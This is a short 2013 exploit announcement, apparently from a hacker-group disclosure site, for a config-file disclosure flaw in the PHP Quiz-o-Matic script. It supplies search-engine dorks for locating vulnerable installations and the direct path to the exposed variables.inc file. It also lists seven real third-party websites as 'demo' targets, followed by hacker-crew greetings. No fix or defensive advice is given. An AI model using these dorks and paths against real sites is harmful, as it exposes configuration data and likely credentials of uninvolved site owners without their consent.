facebook facebook twitter rss

php quiz o matic by matt hughes Read Config Vulnerability

Author: RetnOHacK , Published: 26-03-2013
-------------------------------------------------------
_____ _ ____ _ _ _ __
| __ \ | | / __ \| | | | | |/ /
| |__) |___| |_ _ __ | | | | |__| | __ _ ___| ' /
| _ // _ \ __| '_ \| | | | __ |/ _` |/ __| <
| | \ \ __/ |_| | | | |__| | | | | (_| | (__| . \
|_| \_\___|\__|_| |_|\____/|_| |_|\__,_|\___|_|\_\

-------------------------------------------------------
[+] Author: RetnOHacK
[+] Team: Procoderz Team Albania
[+] Exploit Title: php quiz o matic by matt hughes Read Config Vulnerability
[+] Date: 26-03-2013
[+] Category: WebApp
[+] Google Dork: php quiz o matic by matt hughes
[+] Bing Drok: Warning: file(): Filename cannot be empty in /variables.inc
[+] Tested on: Linux
-------------------------------------------------------
Exploit:
site.xx/path/quiz/variables.inc

Demo:
http://www.nvak.no/misc/quiz/variables.inc
http://www.ac3.org/KKY_News/quizzes/variables.inc
http://www.nienteansia.it/quiz/variables.inc
http://www.tropicalweather.net/variables.inc
http://www.noanxiety.com/quizzes/variables.inc
http://www.brownteal.com/site/variables.inc
http://www.gomyson.com/mytest/variables.inc
-------------------------------------------------------

Greetz: Hackforums.al, Madleets, WildClique, KHS, **RoAd_KiLlEr**,
TUNISIAN CYBER, Danzel, Dr.Z0mbie, н4χ0яℓ1ƒ3,
Hitcher, Cyberw0rM, CyberCoders, BackdoorMan, OverLoad, and all my friends
-------------------------------------------------------

Like us on Facebook :